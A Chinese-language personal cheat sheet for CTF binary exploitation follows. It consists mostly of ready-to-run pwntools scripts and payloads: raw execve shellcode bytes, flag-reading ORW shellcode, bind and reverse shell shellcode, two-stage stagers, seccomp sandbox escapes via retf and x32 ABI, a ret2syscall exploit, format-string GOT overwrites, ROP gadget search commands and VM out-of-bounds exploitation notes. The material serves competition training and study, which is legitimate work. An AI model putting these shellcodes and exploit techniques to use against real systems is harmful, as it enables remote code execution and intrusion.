一些可能会用到的小知识（不定更）

本人的平常会用到的参考笔记，不定期加点新东西

通用shellcode

32位

from pwn import *
context(arch='i386', os='linux', log_level='debug')
# p = process('./pwn_binary')
shellcode_32 = b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# [技巧] 同样，pwntools 自动生成的写法：
# shellcode_32 = asm(shellcraft.sh())
payload = shellcode_32
p.sendline(payload)
p.interactive()

64位

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
# p = process('./pwn_binary') 
# p = remote('192.168.1.100', 1337) 
shellcode_64 = b"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
# [技巧] 在实战中，如果你不想背这段机器码，可以用 pwntools 一键生成：
# shellcode_64 = asm(shellcraft.sh())
payload = shellcode_64
p.sendline(payload)
p.interactive()

注意：上面这条 amd64 很短，但没有显式设置 rsi，更稳一点的版本看下面补充的 27 字节写法。

shellcode小技巧（补充）

通用思路速记

先看最后跳到 shellcode 前的寄存器和栈，有现成地址就别自己再构造
清零优先顺序通常是 xor reg, reg / push 0; pop reg / xchg / cdq
lea rsp, [rip] 适合 rsp 异常但你又想临时借一个“像栈”的地方
read 的返回值就在 rax/eax，可以直接拿来卡 syscall 号
长度不够时，先构一个二段读入，再把真正 payload 喂进去
输出被关掉时，也可以改走侧信道：猜内存、猜 flag、或者靠崩溃与否判断
某些题里 ds/fs/gs 或 lea reg, [rip] 能白嫖代码段、堆、栈附近地址

用 `read` 返回值直接起 `SROP`

比如 amd64 下，如果让 read 恰好返回 0xf，就能直接把 rax 变成 rt_sigreturn。

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'rsp', 0xf)
asm_code += 'syscall\n'
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.send(payload)
# 第二次发 15 字节，让 read 返回 0xf

注意：

这招常拿来起 SROP
如果 seccomp 把 rt_sigreturn 黑掉了，就别走这条

寄存器几乎全为 `0` 时，先白嫖一次 `syscall`

寄存器几乎全是 0 的时候，也别急着认输。在 amd64 上如果你让 rax/rdi/rsi/rdx... 都是 0 再执行一次 syscall，常见效果是走一遍 read(0, NULL, 0)，然后 rcx 会被改成“下一条指令地址”。这招不是主路子，但在极端受限 shellcode 里，有时候能白嫖一个代码地址。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

asm_code = '''
    xor eax, eax
    xor edi, edi
    xor esi, esi
    xor edx, edx
    syscall
'''

shellcode = asm(asm_code)
print(shellcode.hex())
print(disasm(shellcode))

# 常见现象：
# 1. 执行的是 read(0, NULL, 0)
# 2. rcx 会被写成 syscall 后的下一条指令地址
# 3. r11 会被写成当时的 rflags

有限字符 / 自写 `stager`

如果题目限制的不是“长度”，而是“输入里能出现多少种 byte value”，甚至第二轮输入不能和第一轮复用字节值，那就别硬塞完整 ORW。更实用的思路是先写一个极小字节集的 stager，在 RWX 区运行时自生成真正 payload；判题一般只扫“你输入的字节”，不会管你运行时写出来的 syscall、/flag 或完整 ORW。

最小骨架可以先记这种“写一个字节，再往后挪，再跳回去执行”的样子：

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

asm_code = '''
    add al, 1
    mov byte ptr [rdx+rcx], al
    inc ecx
    jmp rdx
'''

shellcode = asm(asm_code)
print(shellcode.hex())
print(disasm(shellcode))

# 这只是写码器骨架：
# 1. rdx 先指到 RWX 区
# 2. rcx 当偏移
# 3. al 调成目标字节后写进去
# 4. 最后跳回去跑刚写出的 payload

第一段太短时，先读第二段再跳

如果第一段太短，最稳的还是先读第二段：

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

asm_code = shellcraft.read(0, 'rsp', 0x400)
asm_code += 'jmp rsp\n'
print(asm_code)

# 第一段只负责把第二段读到栈上，再跳过去

侧信道爆破内存 / flag

侧信道爆破内存 / flag 时，常见套路是“猜对就卡住，猜错就异常退出”：

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

context.binary = elf = ELF('./pwn')

TARGET_ADDR = 0x404040   # 改成你想猜的地址

def build_probe(addr, guess):
    asm_code = f'''
        mov rdi, {addr}
        cmp byte ptr [rdi], {guess}
        je ok
        ud2
    ok:
        jmp ok
    '''
    return asm(asm_code)

def probe_byte(addr, guess):
    io = process('./pwn')
    # 远端就改成：
    # io = remote('host', 1337)

    shellcode = build_probe(addr, guess)
    print(disasm(shellcode))

    # 按题目实际输入方式改：
    # 这里默认是“直接把 shellcode 发进去执行”
    io.send(shellcode)

    # 猜对：程序会一直卡在死循环里
    # 猜错：会执行 ud2，通常直接 SIGILL / 崩掉
    sleep(0.2)
    alive = io.poll(block=False) is None
    io.close()
    return alive

for guess in range(0x20, 0x7f):
    if probe_byte(TARGET_ADDR, guess):
        log.success(f'byte maybe = {guess:#x} ({chr(guess)})')
        break

小提醒：

mov rdi, {addr} 就是把你要猜的目标地址塞进 rdi
cmp byte ptr [rdi], {guess} 就是在比较那个地址上的 1 字节
ud2 是故意触发非法指令，方便把“猜错”变成“立刻崩”
jmp ok 是故意卡死，方便把“猜对”变成“超时还活着”
如果题目不是“直接发 shellcode”，就把 io.send(shellcode) 换成你实际的溢出/跳转 payload

ORW / 文件读取shellcode

ORW = open + read + write，比赛里拿 flag 很常见。

如果你想看 shellcraft 具体生成了什么，直接这样：

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.open('/flag', 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.send(payload)
p.interactive()

amd64 / x64

最省事：cat('/flag')，本质是 open + sendfile，53字节

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.cat('/flag')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

更通用：readfile('/flag', 1)，不依赖 sendfile，76字节

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.readfile('/flag', 1)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

经典 ORW：open + read + write，64字节

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.open('/flag', 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

openat 变种：open 被 ban 但 openat 还活着时，71字节

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
AT_FDCWD = -100
asm_code = shellcraft.openat(AT_FDCWD, '/flag', 0, 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

动态路径版：先从 stdin 读路径，再 ORW，51字节 + 你输入的路径

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'rsp', 0x20)
asm_code += shellcraft.open('rsp', 0, 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
p.send(b'/flag\x00')
p.interactive()

x86 / i386

最省事：cat('/flag')，本质是 open + sendfile，35字节

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.cat('/flag')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

更通用：readfile('/flag', 1)，47字节

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.readfile('/flag', 1)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

经典 ORW：43字节

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.open('/flag', 0, 0)
asm_code += shellcraft.read('eax', 'esp', 0x50)
asm_code += shellcraft.write(1, 'esp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

动态路径版：48字节 + 你输入的路径

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'esp', 0x20)
asm_code += shellcraft.open('esp', 0, 0)
asm_code += shellcraft.read('eax', 'esp', 0x50)
asm_code += shellcraft.write(1, 'esp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
p.send(b'/flag\x00')
p.interactive()

已知长度时也可以用 cat2：

amd64：asm_code = shellcraft.cat2('/flag', 1, 0x40)，大约 65 字节
i386：asm_code = shellcraft.cat2('/flag', 1, 0x40)，大约 42 字节

ORW 小提醒：

cat() 走的是 sendfile，题目 ban sendfile 时别用它
readfile() 更通用，但通常比 cat() 长
动态路径版记得发 b'/flag\x00'，不要带换行
用 rsp/esp 当缓冲区会覆盖栈内容，如果你的 ROP 还要继续跑，优先改到 bss 地址
seccomp 题先看过滤掉了哪些 syscall，再决定用 open/openat/read/write/sendfile 哪种组合

其他架构 pwn 速记

做非 x86/x64 的题，先别急着抄 exp，先把这几件事看清：

架构和大小端：arm/armel/aarch64/mips/mipsel/riscv64
系统调用约定：哪个寄存器放 syscall 号，哪些寄存器传参
调用模式：ARM/Thumb、mips 大小端、riscv64 的 ecall
本地调试链：qemu-user、gdb-multiarch、对应 libc/ld.so

常见约定速记：

ARM32：r0-r2 传参，r7 放 syscall 号，svc 0
AArch64：x0-x5 传参，x8 放 syscall 号，svc 0
MIPS：a0-a3 传参，v0 放 syscall 号，syscall
RISC-V：a0-a5 传参，a7 放 syscall 号，ecall

几个很容易忘的坑：

ARM/Thumb 切换时，跳到 Thumb 代码的地址最低位通常要置 1
MIPS 先确认是大端还是小端，很多题远程是 mipsel
MIPS 常见调用点是 jalr $t9
AArch64 很多文件读取 shellcode 直接走 openat

本地起程序常用命令：

qemu-arm -L ./rootfs ./pwn
qemu-aarch64 -L ./rootfs ./pwn
qemu-mipsel -L ./rootfs ./pwn
qemu-riscv64 -L ./rootfs ./pwn
gdb-multiarch ./pwn

pwntools 里这样起最顺手：

from pwn import *

# AArch64
p = process(['qemu-aarch64', '-L', './rootfs', './pwn'])

# ARM
# p = process(['qemu-arm', '-L', './rootfs', './pwn'])

# MIPS little-endian
# p = process(['qemu-mipsel', '-L', './rootfs', './pwn'])

# RISC-V
# p = process(['qemu-riscv64', '-L', './rootfs', './pwn'])

网络shell / stager

amd64 绑定 shell，128字节

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.bindsh(9999, 'ipv4')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

amd64 反弹 shell，118字节（connect() 后已连接 socket 在 rbp）

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.connect('127.0.0.1', 9999, 'ipv4')
asm_code += shellcraft.dupsh('rbp')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

i386 反弹 shell，118字节（connect() 后已连接 socket 在 edx）

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.connect('127.0.0.1', 9999, 'ipv4')
asm_code += shellcraft.dupsh('edx')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

二阶段 stager：第一次只塞一个很短的 read + jmp，第二次再喂大 shellcode

amd64 15字节

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'rsp', 0x400)
asm_code += 'jmp rsp\n'
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
p.send(stage2_shellcode)
p.interactive()

i386 15字节

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'esp', 0x400)
asm_code += 'jmp esp\n'
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
p.send(stage2_shellcode)
p.interactive()

受限字符与沙箱备忘

可打印 / 字母数字 shellcode：

alpha3：适合 x86/x64，需要指定基址寄存器

python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"
./shellcode_x64.sh rax
./shellcode_x86.sh eax

AE64：amd64 的可见字符编码也很好用，和 alpha3 一起备着
如果字符集更死，只剩部分字母/数字，思路就是先爆出可用指令碎片，再用 xor/add 拼目标指令
如果只给两三个字符，或者只允许一小段 ASCII / 数字区间，本质还是先枚举“能解释成什么指令”，再按执行地址和上下文去拼目标 shellcode
极端一点时，甚至可以只用三种字符去编码 x86_64 shellcode，本质还是“枚举片段 -> 组合 -> 自修改/解码”

爆可用指令碎片的小脚本：

import itertools
from pwn import *

context.arch = 'amd64'
alphabet = '0123456789:;<=>?@'

for n in range(1, 4):
    for seq in itertools.product(alphabet, repeat=n):
        ins = disasm(''.join(seq).encode())
        if not any(x in ins for x in ('.byte', 'rex', 'ds', 'bad', 'ss')):
            print(ins)

多架构通用 shellcode：

有些题会要求同一段 payload 同时跑在 x86/x64/arm/arm64/mips 里
常见思路是做 polyglot dispatch：让 A 架构的 jmp/branch 在 B 架构下变成 nop 或无害字节
真做题时通常是 stage0 负责分流，后面接各架构自己的 stage1
关键词可以记：xarch_shellcode、polyshell
这类题更像手工拼装，不是 shellcraft.sh() 一把梭

seccomp / 沙箱绕过备忘：

open 被 ban 时先看 openat
read/write 被 ban 时再看 readv/writev
execve 被 ban 时优先想 orw、execveat，或者先 read 一个二阶段
如果沙箱没检查 ARCH_X86_64，可以考虑 retf 切到 32 位，或直接 int 0x80
如果沙箱没拦 A >= 0x40000000，旧内核上可以试 x32 ABI 的 0x40000000 + X
如果 io_uring 没被拦，高版本内核上也值得看一眼；它不是常规路子，但偶尔能一条 syscall 做很多事

x32 ABI 下的 read（仅旧内核；Linux 5.16+ 一般别指望）

xor eax, eax
add eax, 0x40000000
xor edi, edi
mov rsi, rsp
mov edx, 0x300
syscall

retf 从 64 位切到 32 位的常见模板：

mov eax, 0x23
mov dword ptr [rsp+4], eax
mov eax, 0x400800      ; 32位代码入口
mov dword ptr [rsp], eax
retf

ret2shellcode

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io = process("./bin")
shellcode = asm(shellcraft.sh())
ret_addr = 0x202011
# 把shellcode放到缓冲区的前端，然后填充padding,最后覆盖返回地址
payload = shellcode.ljust(0x68, b"a") + p64(ret_addr)
io.sendline(payload)
io.interactive()

注意vmmap看下缓冲区是否可执行

ret2syscall

ROPgadget --binary ./ret2syscall --only "int"
ROPgadget --binary ./ret2syscall --string "/bin/sh"
ROPgadget --binary ./ret2syscall --only "pop|ret" | grep "eax"

注意：

32位系统 (x86 / i386) 的 execve

在 32 位 Linux 下，发起系统调用使用的是 int 0x80 指令，且系统调用号 11（十六进制就是 0xb）代表 execve。传参使用的是 ebx, ecx, edx。

指令： int 0x80
eax： 0xb (系统调用号 11)
ebx： /bin/sh 的内存地址 (第 1 个参数 filename)
ecx： 0x0 (第 2 个参数 argv，通常设为 NULL)
edx： 0x0 (第 3 个参数 envp，通常设为 NULL)

int 0x80(eax = 0xb, ebx = /bin/sh_addr, ecx = 0x0, edx = 0x0 )

64位系统 (amd64 / x64) 的 execve

在 64 位 Linux 下，发起系统调用不再使用 int 0x80，而是使用更高效的 syscall 指令。同时，execve 的系统调用号变成了 59（十六进制是 0x3b），传参的寄存器也变了。

正确的 64 位打法是这样的：

指令： syscall
rax： 59 或 0x3b (系统调用号 59)
rdi： /bin/sh 的内存地址 (第 1 个参数 filename)
rsi： 0x0 (第 2 个参数 argv)
rdx： 0x0 (第 3 个参数 envp)

syscall(rax = 0x3b, rdi = /bin/sh_addr, rsi = 0x0, rdx = 0x0)

from pwn import *
io=process("./ret2syscall")
pop_eax_ret= 0x080bb196
pop_edx_ecx_ebx_ret= 0x0806eb90
bin_sh_addr= 0x080be408
int_80_addr= 0x08049421
payload="A"*112+p32(pop_eax_ret)+p32(0xb)+p32(pop_edx_ecx_ebx_ret)+p32(0x0)+p32(0x0)+p32(bin_sh_addr)+p32(int_80_addr)
io.sendline(payload)
io.interactive()

格式化字符串

%p：按指针打印，常用来扫栈
%x / %lx：按整数打印，也能用来扫栈
%s：把参数当地址，再把该地址指向的字符串打印出来
%c：打印一个字符，常配合宽度控制输出长度
%n：把“当前已输出字符数”写到参数指向的地址
%hn：写 2 字节
%hhn：写 1 字节
%lln：写 8 字节

位置参数也非常重要：

%6$p：取第 6 个参数并按指针打印
%10$s：把第 10 个参数当地址，再读那个地址上的字符串
%7$n：把当前输出长度写到第 7 个参数指向的位置

1. 找偏移

先看你的输入在第几个参数位置。

常见 payload：

AAAA.%p.%p.%p.%p.%p.%p.%p

或者更明确一点：

aaaabbbb.%1$p.%2$p.%3$p.%4$p.%5$p.%6$p

观察哪里出现：

0x61616161
或者 0x6262626261616161

2. 信息泄露

扫栈最常用：

%p.%p.%p.%p.%p.%p

可能泄露到：

栈地址
返回地址
libc 地址
PIE 地址
canary 附近内容

经验上：

长得像 0x7f… 的常是 libc
长得像 0x55… 的常是 PIE/程序基址
长得像 0x7ff… 的常是栈

任意地址读：%s,

%s 会一直读到 \x00
如果地址不可读，程序会崩

3. 任意写

payload = p32(target) + b"%100c%6$n"

这里假设偏移是6
往 target 写入 100 或 104 之类的值
取决于前面已经输出了多少字符

4. 输出计数控制

%n 写入的是“当前总输出数”，所以你要想办法把这个数调到你想要的值。

%123c

表示补到输出 123 个字符

比如

addr = 0x0704A06C
payload = p32(addr) + b'%9999c%6$n'

这里假设偏移是6，addr写到第6个参数
%9999c：让 printf 输出 9999 个字符
%6$n：把“到目前为止已经输出的字符数”写到第 6 个参数指向的地址里

4（addr的字节数） + 9999 = 10003，所以会把10003写入addr

5. fmtstr_payload 快速生成 GOT 覆盖 payload

如果目标是 32 位程序，且 GOT 可写（常见于 Partial RELRO），格式化字符串可以把 exit@got 这类函数表项改成 win。手算 %hhn 时要同时算“已经输出了多少字节”和每个字节的回绕，非常容易算烦。

比如把 exit@got 按字节改成 0x0804857b：

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

sh = process("./pri_32")
elf = ELF("./pri_32")

exit_got = elf.got['exit']
win_addr = 0x0804857b

payload = b"http://"
payload += p32(exit_got) + p32(exit_got + 1) + p32(exit_got + 2) + p32(exit_got + 3)
payload += b"%" + str(0x7b - 13 - 16).encode() + b"c%13$hhn"
payload += b"%" + str(0x85 - 0x7b).encode() + b"c%14$hhn"
payload += b"%" + str(0x104 - 0x85).encode() + b"c%15$hhn"
payload += b"%" + str(0x108 - 0x104).encode() + b"c%16$hhn"

sh.sendline(payload)
sh.interactive()

这里的核心是：

0x0804857b 按小端拆成 7b 85 04 08
%hhn 只写 1 字节，所以写 0x04 时可以把总输出数抬到 0x104
同理最后写 0x08 时抬到 0x108
13 是格式化字符串参数偏移，16 是前面 4 个地址的长度

当然，实战里更推荐直接让 pwntools 帮你生成：

payload = b"http://" + fmtstr_payload(
    13,
    {exit_got: win_addr},
    numbwritten=len(b"hello,http://"),
    write_size='byte',
)

简写成位置参数就是：

payload = b"http://" + fmtstr_payload(13, {exit_got: win_addr}, 13)

注意：前一个 13 是偏移位置，后一个 13 是已经输出的字符数，也就是 hello,http:// 的长度。如果你改了前缀、程序输出内容或 payload 布局，偏移和 numbwritten 都要重新确认

ROPgadget / one_gadget / gadget 查找命令

最常用的一组基础检查：

checksec --file=./pwn
file ./pwn
ldd ./pwn
readelf -a ./pwn | grep RELRO
readelf -a ./pwn | grep PIE

先找最基础的 gadget：

ROPgadget --binary ./pwn --only "ret"
ROPgadget --binary ./pwn --only "pop|ret"
ROPgadget --binary ./pwn --only "syscall|int|sysenter"
ROPgadget --binary ./pwn --only "leave|ret"
ROPgadget --binary ./pwn --only "xchg|ret"

精确找常见寄存器控制：

ROPgadget --binary ./pwn --only "pop|ret" | grep "rdi"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rsi"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rdx"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rax"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rbp"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rsp"

32 位常见寄存器控制：

ROPgadget --binary ./pwn --only "pop|ret" | grep "eax"
ROPgadget --binary ./pwn --only "pop|ret" | grep "ebx"
ROPgadget --binary ./pwn --only "pop|ret" | grep "ecx"
ROPgadget --binary ./pwn --only "pop|ret" | grep "edx"

找 jmp/call 一类控制流 gadget：

ROPgadget --binary ./pwn --only "jmp|call"
ROPgadget --binary ./pwn --only "jmp|call" | grep "rsp"
ROPgadget --binary ./pwn --only "jmp|call" | grep "rax"
ROPgadget --binary ./pwn --only "jmp|call" | grep "esp"
ROPgadget --binary ./pwn --only "jmp|call" | grep "eax"

找字符串和 syscall：

ROPgadget --binary ./pwn --string "/bin/sh"
ROPgadget --binary ./pwn --string "/bin//sh"
ROPgadget --binary ./pwn --string "/flag"
ROPgadget --binary ./pwn --opcode "0f05"
ROPgadget --binary ./pwn --opcode "cd80"

找 pivot / SROP / 栈迁移常用 gadget：

ROPgadget --binary ./pwn --only "leave|ret"
ROPgadget --binary ./pwn --only "mov|ret" | grep "rsp"
ROPgadget --binary ./pwn --only "xchg|ret" | grep "rsp"
ROPgadget --binary ./pwn --only "syscall|ret"
ROPgadget --binary ./pwn --only "syscall"

找 __libc_csu_init / 通用控参片段：

objdump -d ./pwn | grep -A40 "__libc_csu_init"
ROPgadget --binary ./pwn --only "pop|mov|call|ret" | grep "r12"

找 libc 里的 gadget：

ROPgadget --binary ./libc.so.6 --only "ret"
ROPgadget --binary ./libc.so.6 --only "pop|ret" | grep "rdi"
ROPgadget --binary ./libc.so.6 --only "syscall"
ROPgadget --binary ./libc.so.6 --string "/bin/sh"

one_gadget 常用命令：

one_gadget ./libc.so.6
one_gadget --raw ./libc.so.6
one_gadget -l 2 ./libc.so.6
one_gadget -l 3 ./libc.so.6

已知 libc base 后直接算 one_gadget：

from pwn import *

libc = ELF('./libc.so.6')
libc.address = 0x7ffff7dc0000

# 先用 one_gadget ./libc.so.6 查出 offset
og = libc.address + 0xe3afe
print(hex(og))

pwntools 里顺手找 gadget：

from pwn import *

context.binary = elf = ELF('./pwn')
rop = ROP(elf)

print('ret        =', rop.find_gadget(['ret']))
print('pop rdi    =', rop.find_gadget(['pop rdi', 'ret']))
print('pop rsi    =', rop.find_gadget(['pop rsi', 'ret']))
print('pop rdx    =', rop.find_gadget(['pop rdx', 'ret']))
print('leave ret  =', rop.find_gadget(['leave', 'ret']))

seccomp-tools 常用检测：

seccomp-tools dump ./pwn
seccomp-tools dump ./pwn -- ./pwn
seccomp-tools dump -- ./ld.so --library-path . ./pwn
seccomp-tools asm ./filter.asm
seccomp-tools disasm ./filter.bpf

ldd / patchelf / 本地 patch 常用命令：

ldd ./pwn
patchelf --print-interpreter ./pwn
patchelf --print-needed ./pwn
patchelf --set-interpreter ./ld-linux-x86-64.so.2 ./pwn
patchelf --replace-needed libc.so.6 ./libc.so.6 ./pwn
patchelf --set-rpath . ./pwn
LD_PRELOAD=./libc.so.6 ./pwn
pwninit --bin ./pwn --libc ./libc.so.6

比赛里很常用的一组本地排查：

objdump -d ./pwn | grep syscall
objdump -d ./pwn | grep "pop    %rdi"
readelf -a ./pwn | grep fini
readelf -a ./pwn | grep RELRO
strings -a -t x ./pwn | grep "/bin/sh"

GDB / pwndbg 常用调试命令

下面这组里既有原生 gdb，也有 pwndbg 常用命令。

先配常用选项：

set disassembly-flavor intel
set pagination off
set follow-fork-mode child
set detach-on-fork off

启动 / 附加：

gdb ./pwn
r
start
attach <pid>

断点和执行流程：

b *main
b *0x401234
tb *0x401234
info b
c
ni
si
finish
until *0x4012ab

看寄存器 / 栈 / 内存：

i r
x/20gx $rsp
x/40bx $rax
x/s $rdi
telescope $rsp 20
vmmap
info proc mappings

堆题常用：

heap
bins
tcachebins
fastbins
smallbins
largebins
arena
vis_heap_chunks

找关键地址 / 关键字节：

piebase
libcbase
search -x 0xfbad1800
search -t bytes 0f05
find /bin/sh

fork / seccomp / syscall 题常用：

set follow-fork-mode child
set detach-on-fork off
catch fork
catch syscall openat
catch syscall read
catch syscall write
handle SIGALRM nostop noprint pass

比赛里很常见的一套起手：

b *main
r
vmmap
i r
x/20gx $rsp
disas main

VM Pwn

VM Pwn 题的核心，不是先写 exp，而是先把“虚拟机的真实内存模型”看清楚。

先看这几个问题：

字节码格式是什么
opcode/operand 是几字节
虚拟寄存器、虚拟栈、虚拟内存分别放在哪
handler table 在哪
guest 的越界，能不能打到 host 的结构体字段

最常见的 dispatch loop 长这样：

movzx eax, byte ptr [rdi+rcx]      ; opcode = code[pc]
inc rcx                            ; pc++
jmp qword ptr [r8+rax*8]           ; handlers[opcode]()

常见含义：

rdi 指向 bytecode/code buffer
rcx 是 pc
r8 是 handler table

如果题里是 switch/jumptable，通常你会看到这种模式：

movzx eax, byte ptr [rbx+rdx]
add rdx, 1
cmp eax, 0x10
ja  default_case
jmp qword ptr [rip+table+rax*8]

单条 handler 常见长这样：

movzx eax, byte ptr [rdi+rcx]      ; dst
inc rcx
movzx edx, byte ptr [rdi+rcx]      ; src
inc rcx
mov r8, qword ptr [r9+rax*8]       ; regs[dst]
add r8, qword ptr [r9+rdx*8]       ; regs[dst] += regs[src]
mov qword ptr [r9+rax*8], r8
jmp dispatch

你做题时真正要盯的是这些 bug：

index 没检查，上来就是 regs[idx]、mem[idx]
signed/unsigned 混了，负数下标直接越界
读写宽度不一致，byte/word/dword/qword 混用
opcode 解码和执行之间有 double fetch
bytecode 区和 data 区重叠，可自修改
JIT 页是 RWX

负数下标 / 有符号越界最常见的汇编味道：

movsxd rax, dword ptr [rdi+rcx]    ; idx 被符号扩展
add rcx, 4
mov rdx, qword ptr [r8+rax*8]      ; idx < 0 就直接往前越界

宽度错配常见味道：

mov eax, dword ptr [rdi+rcx]       ; 只取 32 位
add rcx, 4
lea rdx, [r8+rax*8]                ; 后面当 64 位索引用
mov qword ptr [rdx], r9

这类题最常见的利用路线：

先用 OOB read 泄漏 VM struct、heap、PIE、libc
再用 OOB write 改 handler table、函数指针、code ptr、返回地址
如果 guest memory 映射到 host heap 上，就直接把它当任意地址读写原语
如果是 JIT VM，优先找 RWX 页，直接写 shellcode

做 VM Pwn 时的调试重点：

每执行一条 opcode 就记一次 pc/sp/reg
把 opcode 到 handler 的映射表先抄出来
看 vm->regs、vm->mem、vm->code 在结构体里的相对偏移
看 host 里的 vm struct 是在栈上还是堆上
如果是菜单题，注意 reset / destroy VM 时有没有 UAF

很常见的结构体大概长这样：

struct VM {
    uint8_t *code;
    uint64_t pc;
    uint64_t regs[8];
    uint8_t mem[0x100];
    void (*handlers[0x20])(struct VM *);
};

这种布局下，一旦 regs[idx] 或 mem[idx] 越界，最值得先看的目标就是：

code
pc
handlers
VM 对象前后的堆管理字段

如果你要自己写 bytecode helper，先写这种最小骨架：

from pwn import *

def op(opcode, *args):
    return p8(opcode) + b''.join(p8(x & 0xff) for x in args)

code = b''
code += op(0x01, 0x00, 0x01)   # add r0, r1
code += op(0x02, 0xff, 0x00)   # 故意构造异常 idx
code += op(0x09)               # exit / halt

然后再逐步扩成：

mov_imm
load
store
add/sub/xor/shl/shr
jmp/jnz
putc/print

VM Pwn 小提醒：

先还原解释器语义，再谈利用
先找 guest bug 怎么映射成 host primitive，再谈控制流
很多 VM 题表面像“逆向题”，本质还是堆题、栈题、函数指针题
如果 interpreter 是 C++ 写的，记得顺手看 vtable

最小 helper demo：

from pwn import *

def op(opcode, *args):
    out = p8(opcode)
    for x in args:
        if -0x80 <= x <= 0xff:
            out += p8(x & 0xff)
        else:
            out += p32(x & 0xffffffff)
    return out

def mov_imm(dst, imm):
    return p8(0x10) + p8(dst & 0xff) + p64(imm & 0xffffffffffffffff)

def load(dst, idx):
    return op(0x20, dst, idx)

def store(idx, src):
    return op(0x21, idx, src)

def put(reg):
    return op(0x30, reg)

def halt():
    return op(0xff)

# 先 leak，再 write
NEG_IDX = -8
code = b''
code += mov_imm(0, NEG_IDX & 0xffffffffffffffff)
code += load(1, 0)      # leak vm struct 邻接数据
code += put(1)
code += halt()

# p.send(code)

比赛中积累的tricks

堆上没有直接泄漏接口，而且申请size还卡得很小，怎么先把题做成可 leak？(需要UAF)

先 free 两个 fastbin chunk，再改其中一个 free chunk 的 fd，让下一次分配回到另一个 chunk 的 data 段,在 data 段里先伪造一个小 fake chunk，再 malloc 两次把它拿回来，制造堆块重叠，然后编辑把 size 抬到 unsorted 可用范围，就能继续做 libc leak、转stdout，或者再接别的堆风水

from pwn import *

context.binary = elf = ELF('./pwn')
libc = ELF('./libc.so.6')
p = process('./pwn')

def add(size, idx, data=b'aaaa'):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendafter(b'data: ', data)

def edit(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendafter(b'data: ', data)

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())

